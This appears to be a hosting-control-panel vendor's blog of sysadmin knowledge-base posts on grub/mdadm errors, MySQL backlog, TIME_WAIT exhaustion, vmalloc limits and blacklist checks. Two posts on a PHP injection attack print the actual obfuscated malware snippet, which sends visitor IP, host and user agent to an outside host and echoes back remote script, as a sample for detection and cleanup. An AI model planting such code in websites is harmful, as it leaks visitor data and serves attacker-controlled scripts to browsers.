Blog

KB: 16052014-001: Fixing the “/usr/sbin/grub-probe: error: no such disk.” error for device /dev/md0

So, you are running a Debian-like system, you are upgrading your kernel, and during the process you get the following error:

update-initramfs: Generating /boot/initrd.img-2.6.32-5-amd64
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 2.6.32-5-amd64 /boot/vmlinuz-2.6.32-5-amd64
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 2.6.32-5-amd64 /boot/vmlinuz-2.6.32-5-amd64
Generating grub.cfg ...
/usr/sbin/grub-probe: error: no such disk.
run-parts: /etc/kernel/postinst.d/zz-update-grub exited with return code 1
Failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.32-5-amd64.postinst line 799.

Possibly you have googled it and found various solutions like the ones at the following links, but none of them works:

http://www.linuxexpert.ro/Troubleshooting/grub-error-no-such-disk.html

https://lists.debian.org/debian-user/2011/06/msg00359.html

http://www.linuxquestions.org/questions/debian-26/usr-sbin-grub-probe-error-no-such-disk-922118/

The curious thing is that your system is running perfectly, there is no error in /proc/mdstat (please cat that file just to be sure), and if you run a simple “ls -la” over /dev/md0 and the component disks that make up that array, you find that everything is right. No error.

At some point, you find that you have to run the following command to check what grub-probe thinks about your hard disks:

/usr/sbin/grub-probe --device-map=/boot/grub/device.map --target=fs -v /boot/grub

However, its output ends with:

/usr/sbin/grub-probe: info: opening md0.
/usr/sbin/grub-probe: error: no such disk.

If all of this matches your case, please make sure the mdadm command is available. It is possible that you have removed it by mistake. Because grub-probe runs mdadm --examine /dev/md0, it mistakes the “command not found” failure for an error reported by that command, and ends up reporting “no such disk”.

Please try the following to see if it works:

>> apt-get install mdadm
>> apt-get install -f
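
Before reinstalling, it can help to confirm that the binary is really missing. The following is a minimal Python sketch, not part of grub or Core-Admin: the helper name missing_tools is hypothetical, and it only looks up the commands in the PATH of the user running it (mdadm usually lives in /sbin, so run it as root).

```python
import shutil


def missing_tools(tools, which=shutil.which):
    """Return the commands from `tools` that cannot be found on PATH."""
    return [tool for tool in tools if which(tool) is None]


def report(tools=("mdadm", "grub-probe")):
    """Print one line per tool saying whether it was found."""
    absent = missing_tools(tools)
    for tool in tools:
        state = "MISSING" if tool in absent else "found"
        print(f"{tool}: {state}")
    return absent
```

Calling report() prints one line per command. If mdadm shows up as MISSING, the apt-get commands above are the next step.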

Note for Core-Admin users

If you are running Core-Admin’s mdadm checker, it will ensure that mdadm is available, apart from checking your hard disks and the details inside /proc/mdstat.

Please make sure you have the mdadm checker enabled so that this error does not reach your system.

Posted in: Administration, Debian, Debian Squeeze, KB


KB: 03042014-001: Dealing with possible back log problems with MySQL

Problem description

Given a server running MySQL with a high connection creation rate, if you receive the following notifications:

WARNING: found MySQL connection failure ((2003, "Can't connect to MySQL server on '127.0.0.1' (110)")), retrying query..

And yet the server is working well and it is possible to query it at the address/port provided, then the TCP backlog (“back log”) queue is probably full.

The rate at which incoming TCP connections are accepted depends on the size of the queue (the size of the current backlog) and on how long a connection stays in the queue (for example, the server may be lagging behind picking connections from the queue).

In the case of MySQL, the default value for back_log is 50. This way we can have up to 50 connections waiting to be accepted.

Note this value has nothing to do with “max_connections” which is the number of concurrent connections, already accepted, that the server is going to work with.

Let’s say “back_log” is the queue to get inside a place, and “max_connections” is the place’s capacity.

Possible problem solution

Assuming no other problem is causing this 2003 code, that is:

  1. No firewall is blocking some (but not all) connections, for example with a burst rate limit.
  2. There is no routing problem that makes connections work only sometimes.

If none of these apply, the server is working but from time to time some connections get rejected for no apparent reason, and there are still connections available (check by running SHOW PROCESSLIST), then follow these steps:

  1. Update the file /etc/mysql/my.cnf and, inside the [mysqld] section, add the following declaration:
    back_log = 200
  2. After that, restart mysql (a restart is required; this value does not take effect after a reload).
    >> service mysql restart
  3. Then connect and run SHOW VARIABLES LIKE 'back_log' to check that the backlog is correctly configured.
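
To double check what the configuration file itself declares (as opposed to what the running server reports), something like the following Python sketch can be used. It is only an illustration: read_option is a hypothetical helper, it reads a single file and does not follow !include or !includedir directives.

```python
def read_option(cnf_text, section, name):
    """Return the last value of `name` inside [section], or None if absent."""
    current = None
    value = None
    for raw in cnf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;!":
            continue  # skip blanks, comments and !include directives
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            continue
        if current != section or "=" not in line:
            continue
        key, _, val = line.partition("=")
        # MySQL accepts dashes and underscores interchangeably in option names
        if key.strip().replace("-", "_") == name:
            value = val.strip()
    return value


def configured_back_log(path="/etc/mysql/my.cnf"):
    """Read back_log from the [mysqld] section of the given file."""
    with open(path) as handle:
        return read_option(handle.read(), "mysqld", "back_log")
```

Keep in mind that on Linux the kernel also caps the listen backlog at the value of net.core.somaxconn, so a very large back_log may not be fully honoured unless that limit is raised too.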

Using Core-Admin to configure back_log

Doing this configuration with Core-Admin is really easy. You only have to:

  1. Load the MySQL management tool (from inside the machine’s view).
  2. Now, click on “Options”.
  3. After that, click on “Configure”.
  4. The configuration panel will then appear. There you can set the back log value you need.

Posted in: MySQL, Performance


KB: 24032014-001: Dealing with TIME WAIT exhaustion (no more TCP connections)


Symptom

Either you have received a time_wait_checker notification or, after a review, you find that all services are up and running but cannot accept more connections (even though they should), or that some services cannot connect to internal services such as database servers (for example MySQL). At the same time, the following command reports more than 30000 entries:

>> netstat -n | grep TIME_WAIT | wc -l
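
If netstat is not installed, roughly the same count can be obtained from /proc. The sketch below is an illustration only (the function names are hypothetical); it relies on the fact that the Linux kernel lists one socket per row in /proc/net/tcp and /proc/net/tcp6, with the state in the fourth column as a hex code, where 06 means TIME_WAIT.

```python
TIME_WAIT_STATE = "06"  # hex code the kernel uses for TIME_WAIT in /proc/net/tcp


def count_time_wait(proc_net_tcp_text):
    """Count TIME_WAIT rows in the text of /proc/net/tcp (or /proc/net/tcp6)."""
    count = 0
    for line in proc_net_tcp_text.splitlines()[1:]:  # first line is the header
        fields = line.split()
        # columns: sl, local_address, rem_address, st, ...
        if len(fields) > 3 and fields[3] == TIME_WAIT_STATE:
            count += 1
    return count


def count_system_time_wait(paths=("/proc/net/tcp", "/proc/net/tcp6")):
    """Sum TIME_WAIT sockets over the IPv4 and IPv6 tables, skipping missing files."""
    total = 0
    for path in paths:
        try:
            with open(path) as handle:
                total += count_time_wait(handle.read())
        except OSError:
            continue  # file not available on this system
    return total
```

Calling count_system_time_wait() on the affected server should give a figure close to the one reported by the netstat pipeline above.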

Another symptom is that specific services like squid fail with the following error:

commBind: Cannot bind socket FD 98 to *:0: (98) Address already in use

Affected releases

All releases may suffer this problem. It’s not a bug but a resource exhaustion problem.

Background

The problem is triggered because some service is creating connections faster than they are collected for reuse. After a TCP connection is closed, a waiting period (TIME_WAIT) starts in which late packets for that closed connection can still be received, so they are not mixed up with a newly created connection using the same addresses and ports.

Every time a TCP connection is created, a local port is needed for the local end point. This local end point port is taken from the ephemeral ports range as defined at:

/proc/sys/net/ipv4/ip_local_port_range

If that range is exhausted, no more TCP connections can be created because there are no more ephemeral (local) ports available.
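
To get a feeling for the numbers, the following Python sketch computes how many ephemeral ports a given range provides and the connection rate it can sustain. Two assumptions are made here and are not taken from this article: the range "32768 61000" is just an example value, and TIME_WAIT is taken to last 60 seconds, as in stock Linux kernels. The limit applies to connections toward a single destination address and port.

```python
def ephemeral_ports(range_text):
    """Number of ports in an ip_local_port_range value such as '32768 61000'."""
    low, high = (int(part) for part in range_text.split())
    return high - low + 1


def max_new_connections_per_second(ports, time_wait_seconds=60):
    """Sustained rate at which ports are released again from TIME_WAIT."""
    return ports / time_wait_seconds


def read_port_range(path="/proc/sys/net/ipv4/ip_local_port_range"):
    """Return the raw content of the kernel setting."""
    with open(path) as handle:
        return handle.read()
```

With the example range, ephemeral_ports("32768 61000") gives 28233 ports, which under the 60 second assumption is roughly 470 new connections per second before the range runs out.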

There are several ways to solve this problem. The following solutions are listed in recommended order:

  1. Identify the application that is creating those connections and review whether there is a problem.
  2. If that is not possible, increase the ephemeral port range. See next section.
  3. If increasing the ephemeral port range does not solve the problem, try to reduce the amount of time a connection can stay in TIME WAIT. See next section.
  4. If that does not solve the problem, try activating the TCP time wait reuse option, which will cause the system to reuse ports that are in TIME WAIT. See next section.

Solution

If you cannot fix the application producing this amount of TIME_WAIT connections, use the following options provided by the time_wait_checker to configure the system to react better to this situation.

  1. First, select the machine and then click on Actions (at the top-right of the machines’ view).
  2. Now, click on “Show machine’s checkers”.
  3. Then select the “time_wait_checker” and click on “Configure”.
  4. After that, a window (Core-Admin time-wait checker options) will be shown to configure various TIME_WAIT handling options.

Now use the available options as described, applying them in the recommended order.

Some notes about Tcp time wait reuse and recycle options

A special note about the Tcp time wait recycle option (/proc/sys/net/ipv4/tcp_tw_recycle): it is considered more aggressive than Tcp time wait reuse (/proc/sys/net/ipv4/tcp_tw_reuse). Both can cause problems because they apply “simplifications” to reduce the wait time and to reuse certain structures. Tcp time wait recycle, given its nature, can cause problems with devices behind a NAT, because their connections are accepted in a seemingly random manner (just one device behind the NAT will be able to connect to a server with this option enabled). As indicated by the tool, “Observe after activation”. More information about Tcp time wait recycle and how it relates to NATed devices is available at http://troy.yort.com/improve-linux-tcp-tw-recycle-man-page-entry/

In general, both options shouldn’t be used if not needed.

Long term solutions

The following solutions are not quick and require preparation, but you can consider them to avoid the problem in the long term.

SOLUTION 1: If possible, update your application to reuse the connections it creates. For example, if those connections are internal database connections, instead of connecting, querying and closing every time, try to reuse the connection as much as possible. In many cases that will greatly reduce the number of pending TIME_WAIT connections.

SOLUTION 2: Another possible solution is to use several IPs for the same service and load-balance across them (through DNS, for example). That way you expand the possible TCP address and port combinations and thus the amount of ephemeral ports available. Every additional IP serving the service adds another full port range.

In any case, SOLUTION 1 is by far better than SOLUTION 2. It is better to have a service consuming fewer resources.

Posted in: KB, Linux Networking


KB: 19032014-001: Fixing kernel memory allocation problem

Symptom

If after enabling the firewall you get the following error:

iptables: Memory allocation problem

Or at the server logs you find the following indications:

vmap allocation for size 9146368 failed: use vmalloc= to increase size.

This means the kernel internal memory has reached the vmalloc limit.

Affected releases

All Core-Admin releases that use Linux kernel 2.6.32 or later.

Background

The first step is to check current limit. To that end, run the following:

>> cat /proc/meminfo | grep -i vmalloc
VmallocTotal: 124144 kB
VmallocUsed: 5536 kB
VmallocChunk: 1156 kB

In this example, VmallocTotal is telling us we have just under 128M of vmalloc memory available.

Given this value, we should raise the limit to something bigger, like 256M or 384M (which may be too much).
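
The same check can be scripted. The following Python sketch (the function names are hypothetical, not a Core-Admin tool) extracts VmallocTotal from the content of /proc/meminfo and converts it from kB to MB, which makes it easier to compare against the value you plan to pass to the kernel.

```python
def vmalloc_total_mb(meminfo_text):
    """Return VmallocTotal in MB (kB / 1024), or None if the field is missing."""
    for line in meminfo_text.splitlines():
        if line.startswith("VmallocTotal:"):
            kilobytes = int(line.split()[1])
            return kilobytes / 1024
    return None


def current_vmalloc_total_mb(path="/proc/meminfo"):
    """Read the value from the running system."""
    with open(path) as handle:
        return vmalloc_total_mb(handle.read())
```

For the example output above, 124144 kB works out to about 121.2 MB.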

Solution

To update this value we have to pass a parameter to the kernel at boot time.

The exact parameter is vmalloc=256M (set the amount of memory you want). Depending on the boot loader you are using, you’ll have to do the following:

1) LILO: edit /etc/lilo.conf to update the append declaration as follows:

image = /boot/vmlinuz
root = /dev/hda1
append = "vmalloc=256M"

2) GRUB 1.0: edit the “kopt” variable in /boot/grub/menu.lst to include the declaration. A working example is:

kopt=root=UUID=b530efc1-0b0c-419e-affb-87eb9e18b0dc ro vmalloc=256M

After that, save the file and reload the grub configuration. This is usually done with:

>> update-grub

3) GRUB 2.0: edit /etc/default/grub to update the GRUB_CMDLINE_LINUX_DEFAULT variable to include the following declaration:

GRUB_CMDLINE_LINUX_DEFAULT="quiet vmalloc=384M"

After that, you must reload configuration. This is usually done with:

>> update-grub
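
After rebooting, it is worth confirming that the kernel really received the parameter. A minimal Python sketch for that, assuming the standard /proc/cmdline file (the helper name kernel_param is hypothetical):

```python
def kernel_param(cmdline_text, name):
    """Return the value of `name` from a kernel command line.

    Returns "" for a flag without a value (like "quiet") and None when the
    parameter is not present at all.
    """
    for token in cmdline_text.split():
        key, sep, value = token.partition("=")
        if key == name:
            return value if sep else ""
    return None


def booted_vmalloc(path="/proc/cmdline"):
    """Return the vmalloc= value the running kernel was booted with."""
    with open(path) as handle:
        return kernel_param(handle.read(), "vmalloc")
```

If booted_vmalloc() returns None after the reboot, the boot loader configuration was not regenerated or a different menu entry was booted.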

Posted in: KB


Using Core-Admin to resolve php+# web hacking

After a review you find out that several web pages have been updated with code like the following, or maybe a customer whose website is being blocked by the web browser calls you because it includes suspicious code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not harm the server itself if it is properly configured, but they make the affected web pages run remote chat code or ads, which causes Google Chrome and many other browsers to block those pages for running suspicious code.

Understanding these attacks

The problem with these attacks is that they update the original files with “surgical” modifications, which makes it difficult and annoying to get back to the original state.

One option is to have a backup, but newer websites, which use different sorts of caches and php-to-string files, are hard to recover. It is not enough to just replace the affected files. You must get back to a consistent state (for example, the last backup). This means removing the current web files and then restoring from the backup (so that backup files don’t get mixed with current files that weren’t included in the backup).

After this, remember to reset or block all FTP accounts/passwords that were used during the attack.

First line of defense: know when the attack happens

Core-Admin gives you this knowledge as the attack happens. After the modification, Core-Admin’s file system watching service will report “possible php hash attack found” with an indication like the following:

(Screenshot: Core-Admin detecting a php hash attack)

After receiving this notification, you only have to run the following command to find out how many files were modified and how many FTP accounts were compromised. The same command will help you throughout the process of recovering infected files and updating the FTP accounts’ passwords.

>> crad-find-and-fix-phphash-attack.pyc

After running the above command, which only reports, you can execute the same command with the following options to fix the files found and to update the FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

How did this attack happen?

This attack relies on a network of servers in charge of applying these modifications, together with virus/malware software that infects machines where known FTP clients are used. Here is how the attack develops:

  1. The first part of the attack relies on known FTP clients that save passwords at known places in the file system.
  2. It is suspected that using public Wifis and insecure networks while opening FTP sessions may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware software, which extracts the stored FTP accounts and sends them to the servers that will perform the FTP attack.
  4. With this information, the modification servers (that’s how we call them) finally attack using those FTP accounts: they download the original files, update them and then upload them back to their original place.

Important notes about the attack

It is important to understand that modification servers do not carry out the attack right after receiving compromised FTP passwords. They wait until they have several passwords for the same system, and they also delay the attack to disconnect both incidents (the web hack and the infection of your computers).

This way, they hope unaware users will not connect both incidents, which would otherwise lead the user to run an anti-virus scan and stop the information leak.

On the other hand, they also wait to have several accounts so they can carry out a massive attack, looking for confusion and/or magnitude to increase the likelihood that part of the infection will survive.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try not to save FTP accounts in your FTP client. Store them instead in an application that keeps those passwords protected by a password.
  2. Avoid using public Wifis and untrusted shared connections (like hotels) to connect to your FTP servers.
  3. If possible, after doing FTP modifications, enable read-only mode or disable the FTP account using the Core-Admin panel. This way, even if the password is compromised, no modification will be possible.

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security


Automatic and integrated (DNS RBL) blacklist detection for Core-Admin

Have you ever wanted to know automatically when your servers get blacklisted (DNS RBL)?

For the next Core-Admin release we have included a handy checker (rbl_check_checker) that checks whether any of your server IPs is listed in more than 100 known DNS RBL blacklists. If any server is listed, the checker tells you where to go to get more information and request removal.

The checker also detects local LAN IPs and, in that case, automatically uses a remote service to find out which public IP your server is using. With this information the checker is also able to check those local/LAN servers for blacklisting.
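
For readers curious about how a DNS RBL lookup works in general, here is a minimal Python sketch. It is not the rbl_check_checker code: the function names are hypothetical and rbl.example.org is a placeholder zone. The usual DNSBL convention is to reverse the IPv4 octets, append the blacklist zone and resolve the resulting name; if it resolves, the IP is listed.

```python
import ipaddress
import socket


def rbl_query_name(ip, zone):
    """Build the DNS name to query: reversed IPv4 octets followed by the zone."""
    octets = ipaddress.IPv4Address(ip).packed
    return ".".join(str(octet) for octet in reversed(octets)) + "." + zone


def is_listed(ip, zone, resolver=socket.gethostbyname):
    """True when the blacklist zone answers for this IP.

    Any resolution failure (including DNS timeouts) is treated as not listed.
    """
    try:
        resolver(rbl_query_name(ip, zone))
    except socket.gaierror:
        return False
    return True


def needs_public_ip_lookup(ip):
    """Private/LAN addresses cannot be checked directly against an RBL."""
    return ipaddress.ip_address(ip).is_private
```

For example, rbl_query_name("192.0.2.10", "rbl.example.org") produces 10.2.0.192.rbl.example.org. A real checker would repeat is_listed over every zone it knows about and, for LAN addresses, first discover the public IP as described above.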

The checker integrates automatically into your Core-Admin and will give you fresh information for all your servers connected to the panel.

Improving your server IP reputation for mail deliveries

With the rbl-check checker running on your servers you can greatly improve your servers’ IP reputation, because you get instant information about any blacklisting of any running IP as it happens.

A prompt response is key to solving IP reputation problems. The faster you solve them, the less your mail services are affected. With that information you can react promptly, take the required measures and request removal from the blacklist.

Posted in: Blacklist, Core-Admin, Security


KB: 21012014-001: Fixing webhosting php-hash-update attack

Symptom

Core-Admin has reported unauthorized changes to your hosting files and, taking a look at them, you find that they were updated with something similar to:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Affected releases

All

Background

This attack is carried out through the FTP server, by downloading the original file and then updating it with the additional content. In essence, the attack tries to add extra content to your files without touching the rest.

This attack is possible because the password was stolen from a compromised computer infected with a virus or malware that looks for stored passwords at known locations, or because an FTP session was opened using this password over an insecure connection (like public Wifi).
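
Since the injected content is wrapped between two marker comments (#41f893# and #/41f893# in the sample above), affected files can be spotted with a simple pattern search. The following Python sketch only illustrates the idea and is not how the Core-Admin tool works internally. It assumes, based solely on that sample, that the marker is always six hexadecimal digits; it only reports and never modifies files, and it may produce false positives.

```python
import os
import re

# "#xxxxxx#" ... "#/xxxxxx#" with the same six hex digits on both ends
MARKER_BLOCK = re.compile(r"#([0-9a-f]{6})#.*?#/\1#", re.DOTALL)


def find_injected_markers(source):
    """Return the marker ids of every injected-looking block in `source`."""
    return [match.group(1) for match in MARKER_BLOCK.finditer(source)]


def scan_tree(root):
    """Map each .php file under `root` to the markers found in it."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(folder, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    markers = find_injected_markers(handle.read())
            except OSError:
                continue  # unreadable file, skip it
            if markers:
                hits[path] = markers
    return hits
```

Running scan_tree over a hosting directory gives a quick list of candidate files to review before (or after) using the official tool described in the solution.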

Solution

You have to find which files were updated to remove the “additional content added”. Also, you must reset the password of every FTP account that was used to run this attack. Fortunately, Core-Admin already includes an application that automates these tasks.

Follow these steps to clean up and reset all required FTP accounts:

  1. Run the following command as root in a server’s shell:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Once finished, it will report which files were updated and which FTP accounts were compromised. Now, run the tool again asking it to fix this:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

Posted in: KB, Security


ANN: Core-Admin 1.0.32-3207 ready for download!

A new Core-Admin stable release is available with lots of features and corrections. Here is a brief description:

  1. NEW PLATFORMS: Ubuntu Precise Pangolin LTS 12.04.3 and Debian Wheezy 7.0 are now supported. See all our supported platforms here:
    http://www.core-admin.com/portal/get-it/supported-platforms
  2. IMPROVEMENTS: Dojo 1.6.2 is now the default engine for the web client. Several updates were applied to improve the interface experience. The installer is now available in English and Spanish. App installers can now show a progress window with task completion (fully programmable and available to developers creating core-admin applications), and much more; see the change-log.
  3. DEVELOPMENT: released core-admin app-builder to allow creating checkers and new applications on top of Core-Admin.
  4. GENERAL+SECURITY: many fixes and security updates were applied to this release. See log for more details.

See all details at the release note.

Posted in: Core-Admin, Releases
